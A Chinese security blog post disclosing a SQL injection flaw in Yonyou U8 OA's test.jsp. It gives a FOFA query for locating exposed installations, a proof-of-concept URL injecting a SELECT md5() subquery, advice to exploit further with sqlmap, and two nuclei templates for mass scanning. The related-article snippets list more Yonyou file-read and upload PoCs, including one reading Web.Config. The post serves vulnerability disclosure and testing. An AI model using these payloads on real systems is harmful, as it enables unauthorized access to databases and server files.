首页 > 数据库 >用友U8 OA test.jsp SQL注入漏洞

用友U8 OA test.jsp SQL注入漏洞

时间:2023-09-07 16:24:33浏览次数:38  
标签:U8 E5% 8F% E6% OA jsp test

漏洞描述

用友 U8 OA test.jsp文件存在 SQL注入漏洞,由于与致远OA使用相同的文件,于是存在了同样的漏洞

漏洞影响

用友 U8 OA

漏洞复现

fofa语法:title="用友U8-OA"
登录页面如下:

POC
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(1))

出现上图说明目标存在sql注入漏洞,后续的利用可以使用sqlmap进行梭哈

nuclei批量yaml文件

id: yonyou-u8-oa-test-sqli

info:
  name: Yonyou U8 OA test Sqli
  author: bjxsec
  severity: high
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  tags: yonyou,oa,sqli

variables:
  num: "{{rand_int(10)}}"

requests:
  - method: GET
    path:
      - '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'md5({{num}})'

      - type: status
        status:
          - 200
id: yonyou-u8-oa-sqli

info:
  name: Yonyou U8 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: Yonyou U8 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
    - https://www.tencentcloud.com/document/product/627/38435
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-89
  tags: yonyou,oa,sqli
  metadata:
    max-request: 1

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5({{num}})}}'

      - type: status
        status:
          - 200

标签:U8,E5%,8F%,E6%,OA,jsp,test
From: https://www.cnblogs.com/pursue-security/p/17685261.html

相关文章

  • 用友U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞&任意文件上传漏洞
    漏洞简介用友U8CRM客户关系管理系统getemaildata.php存在任意文件读取漏洞,攻击者通过漏洞可以获取到服务器中的敏感文件。用友U8CRM客户关系管理系统getemaildata.php文件存在任意文件上传漏洞,攻击者通过漏洞可以获取到服务器权限,攻击服务器漏洞影响用友U8CRM客户关系......
  • 用友GRP-U8 Proxy SQL注入 CNNVD-201610-923
    漏洞描述用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行影响版本用友GRP-U8行政事业内控管理软件(新政府会计制度专版)漏洞复现fofa语法:title="用友GRP-U8行政事业内控管理软件"登录页面:POC:POST/ProxyHT......
  • Exception starting filter struts2(Caught exception while loading file struts-def
    2008-9-1811:31:57org.apache.catalina.core.StandardContextfilterStart严重:Exceptionstartingfilterstruts2Caughtexceptionwhileloadingfilestruts-default.xml-[unknownlocation] atcom.opensymphony.xwork2.config.providers.XmlConfigurationProvider.lo......
  • 用友畅捷通T+ Upload.aspx任意文件上传漏洞CNVD-2022-60632
    漏洞描述用友畅捷通T+Upload.aspx接口存在任意文件上传漏洞,攻击者通过preload参数绕过身份验证进行文件上传,控制服务器漏洞影响用友畅捷通T+漏洞复现fofa语法:app="畅捷通-TPlus"登录页面如下:上传文件类型验证不完善,可上传任意文件到服务器中的任意位置,验证POCPOST/......
  • 用友时空KSOA imagefield SQL注入
    漏洞简介用友时空KSOA平台/servlet/imagefield存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。漏洞复现fofa查询:app="用友-时空KSOA"登录页面如下:POC:GET/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+......
  • 用友畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
    漏洞描述用友畅捷通T+DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件漏洞复现fofa语法:app="畅捷通-TPlus"登录页面如下POC:/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Confignuclei批量yaml文件id:yonyou_cha......
  • 下拉列表select动态初始化 (JSP页面)
    HTML代码:<td><selectid="as_occt"name="as_occt"><optionselected="selected"value="">智能模糊搜索</option><optionvalue="content">仅搜索内容</option><o......
  • WebUploader 支持 超大上G,多附件上传
    ​ 以ASP.NETCoreWebAPI 作后端 API ,用 Vue 构建前端页面,用 Axios 从前端访问后端 API,包括文件的上传和下载。 准备文件上传的API #region 文件上传  可以带参数        [HttpPost("upload")]        publicJsonResultuploadProject(I......
  • Panel采用autoLoad载入页面如何传参更新页面——EXTJS2.2.1
    //右侧flash图片浏览panelvarflash_pic_panel=newExt.Panel({id:'flash_pic_panel',animate:true,border:false,items:[{autoLoad:{//参数说明-NoDecorate:url拦截中用于标识此请求返回的页面不需装饰url:requestCont......
  • 记录一次 QSqlite driver not loaded 错误
    在调试软件的时候,发现查询sqlite数据出了问题,查询不到数据。通过QSqlQuery::latsError获取错误消息,结果错误原因是drivernotloaded,但是代码中使用QSqlDatabase::drivers()确认了一下是存在QSQLITE的,而且程序运行的时候,也输出了可用drivers里面是包括QSQLITE的。测试代码#i......